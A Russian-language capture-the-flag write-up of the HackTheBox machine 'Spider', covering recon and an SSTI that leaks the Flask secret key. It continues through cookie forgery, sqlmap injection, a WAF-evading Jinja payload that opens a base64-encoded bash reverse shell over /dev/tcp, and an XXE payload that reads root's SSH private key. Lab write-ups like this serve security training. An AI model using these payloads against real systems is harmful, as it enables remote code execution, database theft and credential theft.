Spider (2021)

Ключевые моменты прохождения:

После скана nmap'a мы сможем увидеть два порта - 22(ssh) и 80(http). Полазив немного по сайту, мы найдем SSTI в форме регистрации, но ввод ограничен десятью символами. После прочитаем config шаблонизатора. Также мы можем определить сам шаблонизатор. Поняв, что на сайте используется либо flask либо jinja, мы используем flask-unsign для того, чтобы редактировать куки файлы. Далее с помощью всего, что мы знаем и умеем, вытащим 3 базы данных с помощью sqlmap'а.

Разведка

По дефолту редачим /etc/hosts:

$ sudo vim /etc/hosts

Сканим nmap'ом:

$ nmap -sC -sV 10.10.10.243 -oN nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 28:f1:61:28:01:63:29:6d:c5:03:6d:a9:f0:b0:66:61 (RSA)
|   256 3a:15:8c:cc:66:f4:9d:cb:ed:8a:1f:f9:d7:ab:d1:cc (ECDSA)
|_  256 a6:d4:0c:8e:5b:aa:3f:93:74:d6:a8:08:c9:52:39:09 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to Zeta Furniture.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Форма регистрации:

Также при регистрации выдается уникальный UUID (идентификатор):

На вкладке http://spider.htb/user есть информация об аккаунте:

Получаем юзера

Ввод юзернейма ограничен 10-ю символами, поэтому мы можем использовать дефолтный для SSTI <div data-gb-custom-block data-tag="raw">{{config}}:

Теперь на вкладке http://spider.htb/user можно увидеть вывод пэйлоада:

Весь конфиг:

<Config {'ENV': 'production'
'DEBUG': False
'TESTING': False
'PROPAGATE_EXCEPTIONS': None
'PRESERVE_CONTEXT_ON_EXCEPTION': None
'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'
'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31)
'USE_X_SENDFILE': False
'SERVER_NAME': None
'APPLICATION_ROOT': '/'
'SESSION_COOKIE_NAME': 'session'
'SESSION_COOKIE_DOMAIN': False
'SESSION_COOKIE_PATH': None
'SESSION_COOKIE_HTTPONLY': True
'SESSION_COOKIE_SECURE': False
'SESSION_COOKIE_SAMESITE': None
'SESSION_REFRESH_EACH_REQUEST': True
'MAX_CONTENT_LENGTH': None
'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0
43200)
'TRAP_BAD_REQUEST_ERRORS': None
'TRAP_HTTP_EXCEPTIONS': False
'EXPLAIN_TEMPLATE_LOADING': False
'PREFERRED_URL_SCHEME': 'http'
'JSON_AS_ASCII': True
'JSON_SORT_KEYS': True
'JSONIFY_PRETTYPRINT_REGULAR': False
'JSONIFY_MIMETYPE': 'application/json'
'TEMPLATES_AUTO_RELOAD': None
'MAX_COOKIE_SIZE': 4093
'RATELIMIT_ENABLED': True
'RATELIMIT_DEFAULTS_PER_METHOD': False
'RATELIMIT_SWALLOW_ERRORS': False
'RATELIMIT_HEADERS_ENABLED': False
'RATELIMIT_STORAGE_URL': 'memory://'
'RATELIMIT_STRATEGY': 'fixed-window'
'RATELIMIT_HEADER_RESET': 'X-RateLimit-Reset'
'RATELIMIT_HEADER_REMAINING': 'X-RateLimit-Remaining'
'RATELIMIT_HEADER_LIMIT': 'X-RateLimit-Limit'
'RATELIMIT_HEADER_RETRY_AFTER': 'Retry-After'
'UPLOAD_FOLDER': 'static/uploads'}>

В данном случае нам интересно только это:

'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'

Также нам нужно определить, что используется в качестве шаблонизатора:

Исходя из всего этого, можно понять, что на сайте используется либо flask либо Jinja. Нужно использовать flask-unsign для манипуляций над куки файлами. Это инструмент командной строки для извлечения, декодирования, перебора и создания файлов cookie для приложения Flask.

$ pip3 install flask_unsign

При ошибке:

bash: pip3: command not found

$ sudo apt-get install python3-pip

После этого можно раскодировать и закодировать куки с помощью SECRET_KEY:

$ flask-unsign --decode --cookie "eyJjYXJ0X2l0ZW1zIjpbIjQiXSwidXVpZCI6IjEyNDgyMjJjLTkzZjgtNDI3MS1hNGRkLTQyNjVlMGJkZTQyZSJ9.YYJzEg.bLLc7CZe1WUg5eNCoKQQ39_IZG8"

{'cart_items': ['4'], 'uuid': '1248222c-93f8-4271-a4dd-4265e0bde42e'}

Также можно вытащить базу данных путем SQL-инъекции:

$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dump

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'.
Do you want to process it? [Y/n/q] Y

you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours.
Do you want to merge them in further requests? [Y/n] n

[00:01:58] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic do you want to URL encode cookie values (implementation specific)? [Y/n] n

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

(custom) HEADER parameter 'Cookie #1*' is vulnerable.
Do you want to keep testing the others (if any)? [y/N] y

Портал защищен WAF-ом:

WAF - Web Application Firewall. На сервере выполняет функцию защиты от DDoS, а также разных типовых атак. Чаще всего, для его обхода нужно кодировать символы.

Поэтому можно воспользоваться данным пэйлоадом:

{% raw %}{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zNi85ODk4IDA+JjEK | base64 -d | bash")["read"]() %} a {% endwith %}{% endraw %}

В base64 нужно зашифровать пэйлоад:

$ echo 'bash -i >& /dev/tcp/10.10.16.36/9898 0>&1' |base64

Для получения сессии:

$ nc -nlvp 9898

$ cat /home/chiv/.ssh/id_rsa

$ vim id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]

Получаем рута

Смотрим порты:

$ netstat -ntlp

Пробросим порт:

$ ssh -i id_rsa -L 8000:localhost:8080 [email protected]

Часто новички в ИБ путают порты в пробросе. Слева тот порт, который пробрасывается для себя, а справа порт сервиса на удаленной машине. То есть: это наш порт --->8000:localhost:8080<--- это порт на удаленной машине

При входе на сайт нас встречает окно с логином:

Пошарив по сайту, можно обнаружить XXE уязвимость.

XXE - External Entity Attack, то есть инъекция внешних сущностей XML.

XXE находится в куках, если их расшифровать с помощью flask-unsign, а потом расшифровать в Base64:

$ flask-unsign -d --cookie ".eJw1jE1PwyAAhv-K4eyB1u3SZJcKtHZChfLRcbNhCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJm9od9Dbcd3RVayWkqnMsR7QTUSrwr7rYsvZ9UldONzp1jZkqUWU2nv_L4tDIgb13CIV5b4dqhYYsaPOlNHqUWzDyVqJZlosOtdzCpHFsVwuvl_f7-99N7gdTTada4iPXtOTNQu32nf2hB6NQuvz_zI8_DvUxqag8WObCH7dE92GmTILebwjW824PoIlsM4py9QwOsPiZ9VQg.YZaxVQ.UneH3NWTuZ7SJ2Xkr7GxEtOU5Ss"

{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+MTIzPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}

$ echo "PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+MTIzPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=" | base64 -d

<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>123</username>
        <is_admin>0</is_admin>
    </data>
</root>

C помощью данного пэйлоада через BurpSuite можно получить id_rsa рута:

username=&foo;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+foo+SYSTEM+"/root/.ssh/id_rsa">+]><!--

Повторяем те же действия, что и с id_rsa chiv'а и подключаемся:

$ ssh -i id_rsa_root [email protected]

PreviousPikaboo (2021)NextInsane

Last updated 5 months ago

Was this helpful?